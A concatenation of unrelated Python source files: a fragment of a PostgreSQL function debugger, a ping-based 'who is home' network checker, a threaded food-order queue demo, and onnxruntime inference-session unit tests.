v_tab_object['debug_pid'] = pid
#Run thread that will execute the function
t = StoppableThread(thread_debug_run_func,{ 'v_tab_object': v_tab_object, 'v_context_code': args['v_context_code'], 'v_function': args['v_function'], 'v_type': args['v_type'], 'v_port': args['v_port']},ws_object)
v_tab_object['thread'] = t
#t.setDaemon(True)
t.start()
ws_object.v_list_tab_objects[v_tab_id] = v_tab_object
v_lineno = None
#wait for context to be ready or thread ends
while v_lineno == None and t.isAlive():
time.sleep(0.5)
v_lineno = v_database_control.v_connection.ExecuteScalar('select lineno from omnidb.contexts where pid = {0} and lineno is not null'.format(pid))
# Function ended instantly
if not t.isAlive():
v_database_control.v_connection.Close()
else:
v_variables = v_database_control.v_connection.Query('select name,attribute,vartype,value from omnidb.variables where pid = {0}'.format(pid),True)
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Ready,
'v_remove_context': False,
'v_variables': v_variables.Rows,
'v_lineno': v_lineno
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
elif v_state == debugState.Step:
v_database_control.v_connection.Execute('update omnidb.contexts set breakpoint = {0} where pid = {1}'.format(args['v_next_breakpoint'],v_tab_object['debug_pid']))
try:
v_database_control.v_connection.Execute('select pg_advisory_unlock({0}) from omnidb.contexts where pid = {0}; select pg_advisory_lock({0}) from omnidb.contexts where pid = {0};'.format(v_tab_object['debug_pid']))
#acquired the lock, get variables and lineno
v_variables = v_database_control.v_connection.Query('select name,attribute,vartype,value from omnidb.variables where pid = {0}'.format(v_tab_object['debug_pid']),True)
v_context_data = v_database_control.v_connection.Query('select lineno,finished from omnidb.contexts where pid = {0}'.format(v_tab_object['debug_pid']),True)
#not last statement
if (v_context_data.Rows[0][1]!='True'):
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Ready,
'v_remove_context': True,
'v_variables': v_variables.Rows,
'v_lineno': v_context_data.Rows[0][0]
}
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
else:
v_database_control.v_connection.Execute('select pg_advisory_unlock({0}) from omnidb.contexts where pid = {0};'.format(v_tab_object['debug_pid']))
v_database_control.v_connection.Close()
v_response['v_code'] = response.RemoveContext
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
except Exception:
v_response['v_code'] = response.RemoveContext
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
#Cancelling debugger, the thread executing the function will return the cancel status
elif v_state == debugState.Cancel:
v_tab_object['cancelled'] = True
v_database_control.v_connection.Cancel(False)
v_database_control.v_connection.Terminate(v_tab_object['debug_pid'])
v_database_control.v_connection.Close()
except Exception as exc:
v_response['v_code'] = response.DebugResponse
v_response['v_data'] = {
'v_state': debugState.Finished,
'v_remove_context': True,
'v_error': True,
'v_error_msg': str(exc)
}
try:
v_database_debug.v_connection.Close()
v_database_control.v_connection.Close()
except Exception:
None
ws_object.event_loop.add_callback(send_response_thread_safe,ws_object,json.dumps(v_response))
|
WhoIsHome.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "MPZinke"
##########################################################################################
#
# created by: MPZinke
# on 2020.03.31
#
# DESCRIPTION:
# BUGS:
# FUTURE:
#
##########################################################################################
from datetime import datetime
from os import devnull
import subprocess
from threading import Thread
from time import sleep
import ErrorWriter
class IPChecker:
def __init__(self, IP, image, name, wait=30): # IP address of device, name of device, time between checks
self.IP = IP
self.user_image = image
self.name = name
self.wait = wait
self.is_home = False
self.has_not_ended = True
self.sleep_until_time = datetime.now()
self.thread = Thread(target=self.thread_loop)
def device_is_on_network(self):
with open(devnull, 'w') as FNULL:
return subprocess.call(["ping", "-c", "1", "-w", "1", self.IP], stdout=FNULL) == 0
def end(self):
self.has_not_ended = False
def sleep(self, sleep_until_time):
if type(sleep_until_time) == int():
self.sleep_until_time = datetime.now() + timedelta(seconds=sleep_until_time)
elif type(sleep_until_time) == type(self.sleep_until_time):
self.sleep_until_time = sleep_until_time
def start(self):
self.thread.start()
def thread_loop(self):
while self.has_not_ended:
while datetime.now() < self.sleep_until_time: sleep(15)
try: self.is_home = self.device_is_on_network()
except Exception as error: ErrorWriter.write_error(error)
sleep(self.wait)
|
food_ordering_system.py
|
import threading
import time
from collections import deque
class Queue:
def __init__(self):
self.buffer = deque()
def enqueue(self, val):
self.buffer.appendleft(val)
def dequeue(self):
if len(self.buffer)==0:
print("Queue is empty")
return
return self.buffer.pop()
def is_empty(self):
return len(self.buffer) == 0
def size(self):
return len(self.buffer)
food_order_queue = Queue()
def place_orders(orders):
for order in orders:
print("Placing order for:",order)
food_order_queue.enqueue(order)
time.sleep(0.5)
def serve_orders():
time.sleep(1)
while True:
order = food_order_queue.dequeue()
print("Now serving: ",order)
time.sleep(2)
if __name__ == '__main__':
orders = ['pizza','samosa','pasta','biryani','burger']
t1 = threading.Thread(target=place_orders, args=(orders,))
t2 = threading.Thread(target=serve_orders)
t1.start()
t2.start()
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
from onnxruntime.capi.onnxruntime_pybind11_state import Fail
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
try:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
except Fail as onnxruntime_error:
if str(onnxruntime_error) == "[ONNXRuntimeError] : 1 : FAIL : Unable to serialize model as it contains" \
" compiled nodes. Please disable any execution providers which generate compiled nodes.":
pass
else:
raise onnxruntime_error
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
onnxrt.disable_telemetry_events()
# no-op on non-Windows builds
# may be no-op on certain Windows builds based on build configuration
onnxrt.enable_telemetry_events()
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'TensorrtExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertIn('TensorrtExecutionProvider', sess.get_providers())
options = sess.get_provider_options()
option = options['TensorrtExecutionProvider']
self.assertIn('device_id', option)
self.assertIn('trt_max_partition_iterations', option)
self.assertIn('trt_min_subgraph_size', option)
self.assertIn('trt_max_workspace_size', option)
self.assertIn('trt_dump_subgraphs', option)
self.assertIn('trt_engine_cache_enable', option)
self.assertIn('trt_engine_cache_path', option)
self.assertIn('trt_force_sequential_engine_build', option)
max_partition_iterations = option['trt_max_partition_iterations']
new_max_partition_iterations = int(max_partition_iterations) + 1
min_subgraph_size = option['trt_min_subgraph_size']
new_min_subgraph_size = int(min_subgraph_size) + 1
ori_max_workspace_size = option['trt_max_workspace_size']
new_max_workspace_size = int(ori_max_workspace_size) // 2
option = {}
option['trt_max_partition_iterations'] = new_max_partition_iterations
option['trt_min_subgraph_size'] = new_min_subgraph_size
option['trt_max_workspace_size'] = new_max_workspace_size
dump_subgraphs = "true"
option['trt_dump_subgraphs'] = dump_subgraphs
engine_cache_enable = "true"
option['trt_engine_cache_enable'] = engine_cache_enable
engine_cache_path = './engine_cache'
option['trt_engine_cache_path'] = engine_cache_path
force_sequential_engine_build = "true"
option['trt_force_sequential_engine_build'] = force_sequential_engine_build
sess.set_providers(['TensorrtExecutionProvider'], [option])
options = sess.get_provider_options()
option = options['TensorrtExecutionProvider']
self.assertEqual(option['trt_max_partition_iterations'], str(new_max_partition_iterations))
self.assertEqual(option['trt_min_subgraph_size'], str(new_min_subgraph_size))
self.assertEqual(option['trt_max_workspace_size'], str(new_max_workspace_size))
self.assertEqual(option['trt_dump_subgraphs'], '1')
self.assertEqual(option['trt_engine_cache_enable'], '1')
self.assertEqual(option['trt_engine_cache_path'], str(engine_cache_path))
self.assertEqual(option['trt_force_sequential_engine_build'], '1')
# We currently disable following test code since that not all test machines/GPUs have nvidia int8 capability
'''
int8_use_native_calibration_table = "false"
option['trt_int8_use_native_calibration_table'] = int8_use_native_calibration_table
int8_enable = "true"
option['trt_int8_enable'] = int8_enable
calib_table_name = '/home/onnxruntime/table.flatbuffers' # this file is not existed
option['trt_int8_calibration_table_name'] = calib_table_name
with self.assertRaises(RuntimeError):
sess.set_providers(['TensorrtExecutionProvider'], [option])
'''
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertIn('CUDAExecutionProvider', sess.get_providers())
# test get/set of "gpu_mem_limit" configuration.
options = sess.get_provider_options()
self.assertIn('CUDAExecutionProvider', options)
option = options['CUDAExecutionProvider']
self.assertIn('gpu_mem_limit', option)
ori_mem_limit = option['gpu_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['gpu_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], str(new_mem_limit))
option['gpu_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_mem_limit'], ori_mem_limit)
def test_get_and_set_option_with_values(option_name, option_values):
provider_options = sess.get_provider_options()
self.assertIn('CUDAExecutionProvider', provider_options)
cuda_options = options['CUDAExecutionProvider']
self.assertIn(option_name, cuda_options)
for option_value in option_values:
cuda_options[option_name] = option_value
sess.set_providers(['CUDAExecutionProvider'], [cuda_options])
new_provider_options = sess.get_provider_options()
self.assertEqual(
new_provider_options.get('CUDAExecutionProvider', {}).get(option_name),
str(option_value))
test_get_and_set_option_with_values(
'arena_extend_strategy', ['kNextPowerOfTwo', 'kSameAsRequested'])
test_get_and_set_option_with_values(
'cudnn_conv_algo_search', ["DEFAULT", "EXHAUSTIVE", "HEURISTIC"])
test_get_and_set_option_with_values(
'do_copy_in_default_stream', [0, 1])
option['gpu_external_alloc'] = '0'
option['gpu_external_free'] = '0'
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_alloc'], '0')
self.assertEqual(options['CUDAExecutionProvider']['gpu_external_free'], '0')
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['gpu_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configure session with invalid option values and that should fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'invalid_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configure session with invalid option should fail
with self.assertRaises(RuntimeError):
option = {'invalid_option': 123}
sess.set_providers(['CUDAExecutionProvider'], [option])
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(RuntimeError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue('Unknown Provider Type: InvalidProvider' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precendence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
# numpy 1.20+ doesn't automatically pad the bytes based entries in the array when dtype is np.void,
# so we use inputs where that is the case
x = np.array([b'must', b'have', b'same', b'size'], dtype=np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['must', 'have'], ['same', 'size']], dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
self.assertEqual('', modelmeta.graph_description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be all optimizations optimization
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=bool)
b = np.array([[True, False], [True, False]], dtype=bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
